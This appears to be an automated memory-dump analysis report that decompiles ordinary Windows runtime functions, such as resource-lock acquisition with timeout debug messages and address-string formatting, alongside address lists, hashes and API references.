0x009f0b96
0x00000000
0x009f0b96
0x009f0a04
0x009f0a04
0x009f0b9a
0x009f0b9a
0x009f0b9b
0x009f0b9f
0x00000000
0x00000000
0x00000000
0x009f0ba5
0x009f0ac7
0x009f0aca
0x00a1eacf
0x00000000
0x00a1eade
0x00a1eade
0x00a1eae3
0x00000000
0x00000000
0x00a1eaf3
0x00a1eaf6
0x00a1eaf7
0x00a1eafe
0x00a1eb01
0x00000000
0x00a1eb01
0x00a1eacf
0x009f0ad0
0x009f0ad4
0x00000000
0x00000000
0x009f0ada
0x009f0ae6
0x009f0c34
0x00000000
0x009f0c47
0x009f0c49
0x009f0c4a
0x009f0c4e
0x009f0c51
0x009f0c54
0x009f0c57
0x009f0c5a
0x00000000
0x00000000
0x00000000
0x009f0c60
0x009f0afb
0x009f0afe
0x009f0b02
0x009f0b05
0x009f0b08
0x00000000
0x009f0b08
0x009f0ae6
0x009f0b44
0x009f09f8
0x009f09f8
0x009f09f9
0x00000000
0x00000000
0x00a1eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 009F0BF6
__fassign.LIBCMT ref: 009F0CA2

Strings

:, xrefs: 009F0BA9
:, xrefs: 009F0AC7
., xrefs: 009F0A0C

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 40fa7480716fe85591515bc5ef326a0c98e6045a083758abaa286ae9a4a87c2a
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 51A19B71D0430EEBCF24CF64C8457BEB7BCAF95305F24856ADA86A7283D6349A81CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009F0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E009F0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a901c0;
									_push(_t144);
									_push(0);
									_t51 = E009AF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E009F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00A03F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00A03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00A3217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A03F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E009F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00a901c0;
												_push(_t138);
												_push(0);
												_t58 = E009AF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E009F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00A03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00A03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00A3217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00A03F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E009F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E009D5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E009AF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E009F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E009AF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E009F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E009AF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E009F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E009D5329(_t110, _t138);
																return E009D53A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x009f055a
0x009f055d
0x009f0563
0x009f0566
0x009f05d8
0x009f05e2
0x009f05e5
0x00000000
0x009f05e7
0x009f05e7
0x009f05ea
0x009f05f3
0x009f05f3
0x009f0568
0x009f0568
0x009f0568
0x009f0569
0x009f0569
0x009f0569
0x009f056b
0x00000000
0x00000000
0x00a1217f
0x00a12183
0x00a1225b
0x00a1225f
0x00a12189
0x00a1218c
0x00a1218f
0x00a12194
0x00a12199
0x00a1219d
0x00a121a0
0x00a121a2
0x00a121ce
0x00a121ce
0x00a121ce
0x00a121d0
0x00a121d6
0x00a121de
0x00a121e2
0x00a121e8
0x00a121e9
0x00a121ec
0x00a121f1
0x00a121f6
0x00000000
0x00000000
0x00a121f8
0x00a121fb
0x00a12206
0x00a1220b
0x00a1220c
0x00a12217
0x00a12226
0x00a1222b
0x00a1222c
0x00a1222f
0x00a12232
0x00a12235
0x00a12235
0x00a1223a
0x00a1223f
0x00a12241
0x00a12243
0x00a12248
0x00a12248
0x00a1224d
0x00a1224f
0x00a12262
0x00a12263
0x00a12268
0x00a12269
0x00a12269
0x00a12269
0x00a1226d
0x00000000
0x00000000
0x00a12276
0x00a12279
0x00a1227e
0x00a12283
0x00a12287
0x00a1228a
0x00a1228d
0x00a1228f
0x00a122bc
0x00a122bc
0x00a122bc
0x00a122be
0x00a122c4
0x00a122cc
0x00a122d0
0x00a122d6
0x00a122d7
0x00a122da
0x00a122df
0x00a122e4
0x00000000
0x00000000
0x00a122e6
0x00a122e9
0x00a122f4
0x00a122f9
0x00a122fa
0x00a12305
0x00a12314
0x00a12319
0x00a1231a
0x00a1231d
0x00a12320
0x00a12323
0x00a12323
0x00a12328
0x00a1232d
0x00a1232f
0x00a12331
0x00a12336
0x00a12336
0x00a1233b
0x00a1233d
0x00a12350
0x00a12351
0x00a12356
0x00a12359
0x00a12359
0x00a1235b
0x00a1235d
0x009d5367
0x009d536b
0x009d5372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a12363
0x00a12363
0x00a12369
0x00a1236a
0x00a1236c
0x00a12371
0x00a12373
0x00000000
0x00a12379
0x00a12379
0x00a1237a
0x00a1237f
0x00a1237f
0x00a12385
0x00a12386
0x00a12389
0x00a1238e
0x00a12390
0x009d5378
0x009d537c
0x00a12396
0x00a12396
0x00a12397
0x00a1239c
0x00a123a2
0x00a123a3
0x00a123a6
0x00a123ab
0x00a123ad
0x00000000
0x00a123b3
0x00a123b3
0x00a123b4
0x00a123b9
0x00a123ba
0x00a123ba
0x00a123bc
0x00a123bf
0x00000000
0x00000000
0x00a09153
0x00a09158
0x00a0915a
0x00a0915e
0x00a09160
0x00000000
0x00a09166
0x00a09166
0x00a09171
0x00a09176
0x00a09176
0x00000000
0x00a09160
0x00a123c6
0x00a123d7
0x00a123d7
0x00a123ad
0x00a12390
0x00a12373
0x00a1233f
0x00a1233f
0x00000000
0x00a1233f
0x00a12291
0x00a12291
0x00a12293
0x00a12295
0x00a1229a
0x00a122a1
0x00a122a3
0x00a122a7
0x00a122a9
0x00000000
0x00000000
0x00a122ab
0x00a122ad
0x00a122af
0x00000000
0x00000000
0x00000000
0x00a122af
0x00a122b1
0x00a122b4
0x00a122b4
0x00a122b6
0x009d53be
0x009d53be
0x009d53be
0x009d53c0
0x00000000
0x00000000
0x009d53cb
0x009d53ce
0x009d53d0
0x009d53d4
0x009d53d6
0x00000000
0x009d53d8
0x009d53e3
0x009d53ea
0x009d53ea
0x00000000
0x009d53d6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a122b6
0x00000000
0x00a1228f
0x00a12349
0x00a1234d
0x00a12251
0x00a12251
0x00000000
0x00a12251
0x00a121a4
0x00a121a4
0x00a121a6
0x00a121a8
0x00a121ac
0x00a121b6
0x00a121b8
0x00a121bc
0x00a121be
0x00000000
0x00000000
0x00a121c0
0x00a121c2
0x00a121c4
0x00000000
0x00000000
0x00000000
0x00a121c4
0x00a121c6
0x00a121c6
0x00a121c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00a121c8
0x00a121a2
0x00000000
0x00a12183
0x009f057b
0x009f057d
0x009f0581
0x009f0583
0x00a12178
0x00000000
0x009f0589
0x009f058f
0x009f058f
0x009f0583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A12206

Strings

RTL: Resource at %p, xrefs: 00A1221D, 00A1230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A122FC
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00A1220E
RTL: Re-Waiting, xrefs: 00A1223A, 00A12328

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 1d5a0af4b8faa3273e60d95d7dcb670679ab10ffbe0f9b7fa20f0873a88fddca
Instruction ID: bbb497b358deb1e2571cad1638ccf001397f1b4fbbaddaf7fe02368a5ee03e4f
Opcode Fuzzy Hash: 1d5a0af4b8faa3273e60d95d7dcb670679ab10ffbe0f9b7fa20f0873a88fddca
Instruction Fuzzy Hash: 1B512731B402156FEB14CB18DC81FE633A9ABD4724F218229FD59DF286DA75EC918790

Uniqueness

Uniqueness Score: -1.00%

Function 009F14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E009F14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xa92088; // 0x75962c32
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E009E7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009F13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E009E7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E009E7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E009B2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E009BE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x009f14c0
0x009f14cb
0x009f14d2
0x009f14d6
0x009f14da
0x009f14de
0x009f14e3
0x009f157a
0x009f157a
0x009f14f1
0x009f14f3
0x00a1ea0f
0x00000000
0x00a1ea15
0x00000000
0x00a1ea15
0x009f14f9
0x009f14f9
0x009f14fe
0x009f1504
0x00a1ea1a
0x00a1ea1f
0x00a1ea21
0x00a1ea22
0x00a1ea27
0x00a1ea2a
0x00a1ea2a
0x009f1515
0x009f1517
0x009f156d
0x009f1572
0x009f1575
0x009f1575
0x009f151e
0x00a1ea50
0x00a1ea55
0x00a1ea58
0x00a1ea58
0x009f152e
0x009f1531
0x009f1533
0x00000000
0x009f1535
0x009f1541
0x009f1549
0x009f1549
0x009f1533
0x009f14f3
0x009f1559

APIs

___swprintf_l.LIBCMT ref: 00A1EA22

Part of subcall function 009F13CB: ___swprintf_l.LIBCMT ref: 009F146B
Part of subcall function 009F13CB: ___swprintf_l.LIBCMT ref: 009F1490

___swprintf_l.LIBCMT ref: 009F156D

Strings

]:%u, xrefs: 00A1EA47
%%%u, xrefs: 009F1564

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 9cf865b29951035239dff461af28736fae61d64372a449cd46ad20b1be80daf2
Instruction ID: aa5fe12c5436883a6e16dd65347f833a868a97a2602df93d2c92afafbac39cc1
Opcode Fuzzy Hash: 9cf865b29951035239dff461af28736fae61d64372a449cd46ad20b1be80daf2
Instruction Fuzzy Hash: 5A21AE7290021DEBCB21DFA8CC41AFAB3ACAB90714F544416FE46E3140DB75AA588BE1

Uniqueness

Uniqueness Score: -1.00%

Function 009D53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E009D53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a901c0;
									_push(_t92);
									_push(0);
									_t37 = E009AF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E009F4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00A03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00A03F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00A3217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00A03F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E009F3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E009D5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E009AF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E009F3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E009AF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E009F3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E009AF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E009F3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E009D5329(_t74, _t92);
													_push(1);
													return E009D53A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x009d53ab
0x009d53ae
0x009d53b1
0x009d53b4
0x009d53b7
0x009f05b6
0x009f05c0
0x009f05c3
0x00000000
0x009f05c9
0x009f05c9
0x009f05cc
0x009f05d5
0x009f05d5
0x009d53bd
0x009d53bd
0x009d53bd
0x009d53be
0x009d53be
0x009d53be
0x009d53c0
0x00000000
0x00000000
0x00a12269
0x00a1226d
0x00a12349
0x00a1234d
0x00a12273
0x00a12276
0x00a12279
0x00a1227e
0x00a12283
0x00a12287
0x00a1228a
0x00a1228d
0x00a1228f
0x00a122bc
0x00a122bc
0x00a122bc
0x00a122be
0x00a122c4
0x00a122cc
0x00a122d0
0x00a122d6
0x00a122d7
0x00a122da
0x00a122df
0x00a122e4
0x00000000
0x00000000
0x00a122e6
0x00a122e9
0x00a122f4
0x00a122f9
0x00a122fa
0x00a12305
0x00a12314
0x00a12319
0x00a1231a
0x00a1231d
0x00a12320
0x00a12323
0x00a12323
0x00a12328
0x00a1232d
0x00a1232f
0x00a12331
0x00a12336
0x00a12336
0x00a1233b
0x00a1233d
0x00a12350
0x00a12351
0x00a12356
0x00a12359
0x00a12359
0x00a1235b
0x00a1235d
0x009d5367
0x009d536b
0x009d5372
0x00000000
0x00000000
0x00000000
0x00000000
0x00a12363
0x00a12363
0x00a12369
0x00a1236a
0x00a1236c
0x00a12371
0x00a12373
0x00000000
0x00a12379
0x00a12379
0x00a1237a
0x00a1237f
0x00a1237f
0x00a12385
0x00a12386
0x00a12389
0x00a1238e
0x00a12390
0x009d5378
0x009d537c
0x00a12396
0x00a12396
0x00a12397
0x00a1239c
0x00a123a2
0x00a123a3
0x00a123a6
0x00a123ab
0x00a123ad
0x00000000
0x00a123b3
0x00a123b3
0x00a123b4
0x00a123b9
0x00a123ba
0x00a123ba
0x00a123bc
0x00a123bf
0x00000000
0x00000000
0x00a09153
0x00a09158
0x00a0915a
0x00a0915e
0x00a09160
0x00000000
0x00a09166
0x00a09166
0x00a09171
0x00a09176
0x00a09176
0x00000000
0x00a09160
0x00a123c6
0x00a123cb
0x00a123d7
0x00a123d7
0x00a123ad
0x00a12390
0x00a12373
0x00a1233f
0x00a1233f
0x00000000
0x00a1233f
0x00a12291
0x00a12291
0x00a12293
0x00a12295
0x00a1229a
0x00a122a1
0x00a122a3
0x00a122a7
0x00a122a9
0x00000000
0x00000000
0x00a122ab
0x00a122ad
0x00a122af
0x00000000
0x00000000
0x00000000
0x00a122af
0x00a122b1
0x00a122b4
0x00a122b4
0x00a122b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00a122b6
0x00a1228f
0x00000000
0x00a1226d
0x009d53cb
0x009d53ce
0x009d53d0
0x009d53d4
0x009d53d6
0x00000000
0x009d53d8
0x009d53e3
0x009d53ea
0x009d53ea
0x009d53d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A122F4

Strings

RTL: Resource at %p, xrefs: 00A1230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A122FC
RTL: Re-Waiting, xrefs: 00A12328

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

